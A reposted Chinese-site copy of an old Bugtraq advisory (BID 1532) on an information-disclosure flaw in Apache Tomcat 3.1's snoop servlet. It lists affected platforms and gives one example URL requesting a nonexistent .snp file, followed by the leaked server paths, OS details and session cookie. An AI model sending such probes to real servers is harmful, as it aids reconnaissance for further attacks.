⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 0155.htm

📁 JspServlet教程专栏 对javaservlet讲述的非常详细
💻 HTM
字号:
<html>

<head>
<title>新时代软件教程:操作系统 主页制作 服务器 设计软件 网络技术 编程语言 文字编辑</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style>
<!--
body, table {font-size: 9pt; font-family: 宋体}
a {text-decoration:none}
a:hover {color: red;text-decoration:underline}
.1  {background-color: rgb(245,245,245)}
-->
</style>
</head>
<p align="center"><script src="../../1.js"></script></a>
<p align="center"><big><strong>Apache Tomcat Snoop Servlet重要信息暴露漏洞</strong></big></p>
<div align="right">---摘自互联网</div>

<br>bugtraq&nbsp;id&nbsp;1532&nbsp;<br>
class&nbsp;Design&nbsp;Error&nbsp;<br>
cve&nbsp;GENERIC-MAP-NOMATCH&nbsp;<br>
remote&nbsp;Yes&nbsp;<br>
local&nbsp;No&nbsp;<br>
published&nbsp;July&nbsp;20,&nbsp;2000&nbsp;<br>
updated&nbsp;August&nbsp;02,&nbsp;2000&nbsp;<br>
vulnerable&nbsp;Apache&nbsp;Group&nbsp;Tomcat&nbsp;3.1<br>
-&nbsp;Sun&nbsp;Solaris&nbsp;8.0<br>
-&nbsp;Sun&nbsp;Solaris&nbsp;7.0<br>
-&nbsp;SGI&nbsp;IRIX&nbsp;6.5<br>
-&nbsp;SGI&nbsp;IRIX&nbsp;6.4<br>
-&nbsp;RedHat&nbsp;Linux&nbsp;6.2&nbsp;i386<br>
-&nbsp;RedHat&nbsp;Linux&nbsp;6.1&nbsp;i386<br>
-&nbsp;NetBSD&nbsp;NetBSD&nbsp;1.4.2&nbsp;x86<br>
-&nbsp;NetBSD&nbsp;NetBSD&nbsp;1.4.1&nbsp;x86<br>
-&nbsp;MandrakeSoft&nbsp;Linux&nbsp;Mandrake&nbsp;7.1<br>
-&nbsp;MandrakeSoft&nbsp;Linux&nbsp;Mandrake&nbsp;7.0<br>
-&nbsp;FreeBSD&nbsp;FreeBSD&nbsp;5.0<br>
-&nbsp;FreeBSD&nbsp;FreeBSD&nbsp;4.0<br>
-&nbsp;Digital&nbsp;UNIX&nbsp;4.0<br>
-&nbsp;Debian&nbsp;Linux&nbsp;2.2<br>
-&nbsp;Debian&nbsp;Linux&nbsp;2.1<br>
-&nbsp;Connectiva&nbsp;Linux&nbsp;5.1<br>
-&nbsp;Caldera&nbsp;OpenLinux&nbsp;2.4<br>
-&nbsp;BSDI&nbsp;BSD/OS&nbsp;4.0<br>
Apache&nbsp;Group&nbsp;Tomcat&nbsp;3.0<br>
<br>
A&nbsp;vulnerability&nbsp;exists&nbsp;in&nbsp;the&nbsp;snoop&nbsp;servlet&nbsp; portion&nbsp;of&nbsp;the&nbsp;Tomcat&nbsp;package,&nbsp;version&nbsp;3.1,&nbsp;from&nbsp;the&nbsp;Apache&nbsp;Software&nbsp;Foundation.&nbsp; Upon&nbsp;hitting&nbsp;an&nbsp;nonexistent&nbsp;file&nbsp;with&nbsp;the&nbsp;.snp&nbsp;extension,&nbsp;too&nbsp;much&nbsp;information&nbsp;is&nbsp;presented&nbsp;by&nbsp;the&nbsp;server &nbsp;as&nbsp;part&nbsp;of&nbsp;the&nbsp;error&nbsp;message.&nbsp;This&nbsp;information&nbsp; may&nbsp;be&nbsp;useful&nbsp;to&nbsp;a&nbsp;would&nbsp;be&nbsp;attacker&nbsp;in&nbsp;conducting&nbsp; further&nbsp;attacks.&nbsp;This&nbsp;information&nbsp;includes&nbsp;full&nbsp;paths,&nbsp;OS&nbsp; information,&nbsp;and&nbsp;other&nbsp;information&nbsp;that&nbsp; may&nbsp;be&nbsp;sensitive.<br>
<br>
http://narco.guerrilla.sucks.co:8080/examples/jsp/snp/anything.snp<br>
====<br>
Snoop&nbsp;Servlet<br>
<br>
Servlet&nbsp;init&nbsp;parameters:<br>
<br>
Context&nbsp;init&nbsp;parameters:<br>
<br>
Context&nbsp;attributes:<br>
javax.servlet.context.tempdir&nbsp;=<br>
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples<br>
sun.servlet.workdir&nbsp;=<br>
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples<br>
<br>
Request&nbsp;attributes:<br>
<br>
Servlet&nbsp;Name:&nbsp;snoop<br>
Protocol:&nbsp;HTTP/1.0<br>
Scheme:&nbsp;http<br>
Server&nbsp;Name:&nbsp;narco.goverment.sucks.co<br>
Server&nbsp;Port:&nbsp;8080&nbsp;<br>
Server&nbsp;Info:&nbsp;Tomcat&nbsp;Web&nbsp;Server/3.1&nbsp;(JSP&nbsp;1.1;&nbsp;Servlet&nbsp;2.2;&nbsp;Java&nbsp;1.1.8;&nbsp;AIX<br>
4.2&nbsp;POWER_RS;&nbsp;java.vendor=IBM&nbsp;Corporation)<br>
Remote&nbsp;Addr:&nbsp;xxx.xxx.xxx.xxx<br>
Remote&nbsp;Host:&nbsp;xxx.xxx.xxx.xxx<br>
Character&nbsp;Encoding:&nbsp;null<br>
Content&nbsp;Length:&nbsp;-1<br>
Content&nbsp;Type:&nbsp;null<br>
Locale:&nbsp;en<br>
Default&nbsp;Response&nbsp;Buffer:&nbsp;8192<br>
<br>
Parameter&nbsp;names&nbsp;in&nbsp;this&nbsp;request:<br>
<br>
Headers&nbsp;in&nbsp;this&nbsp;request:<br>
Host:&nbsp;narco.goverment.sucks.co:8080<br>
Accept-Encoding:&nbsp;gzip<br>
Cookie:&nbsp;JSESSIONID=To1212mC7833304641226407At<br>
Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;image/png,<br>
*/*<br>
Connection:&nbsp;Keep-Alive<br>
Accept-Charset:&nbsp;iso-8859-1,*,utf-8<br>
User-Agent:&nbsp;Mozilla/4.51&nbsp;[en]&nbsp;(Winsucks;&nbsp;I)<br>
Accept-Language:&nbsp;en<br>
<br>
Cookies&nbsp;in&nbsp;this&nbsp;request:<br>
JSESSIONID&nbsp;=&nbsp;To1212mC7833304641226407At<br>
<br>
Request&nbsp;Is&nbsp;Secure:&nbsp;false<br>
Auth&nbsp;Type:&nbsp;null<br>
HTTP&nbsp;Method:&nbsp;GET<br>
Remote&nbsp;User:&nbsp;null<br>
Request&nbsp;URI:&nbsp;/examples/jsp/snp/anything.snp<br>
Context&nbsp;Path:&nbsp;/examples<br>
Servlet&nbsp;Path:&nbsp;/jsp/snp/anything.snp<br>
Path&nbsp;Info:&nbsp;null<br>
Path&nbsp;Trans:&nbsp;null<br>
Query&nbsp;String:&nbsp;null<br>
<br>
Requested&nbsp;Session&nbsp;Id:&nbsp;To1212mC7833304641226407At<br>
Current&nbsp;Session&nbsp;Id:&nbsp;To1212mC7833304641226407At<br>
Session&nbsp;Created&nbsp;Time:&nbsp;964047263477<br>
Session&nbsp;Last&nbsp;Accessed&nbsp;Time:&nbsp;964047528749<br>
Session&nbsp;Max&nbsp;Inactive&nbsp;Interval&nbsp;Seconds:&nbsp;1800<br>
<br>
Session&nbsp;values:&nbsp;<br>
numguess&nbsp;=&nbsp;num.NumberGuessBean@6bfa9a1&nbsp;

  </table>
<p align="center"><script src="../../2.js"></script></a>
</body>
</html>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -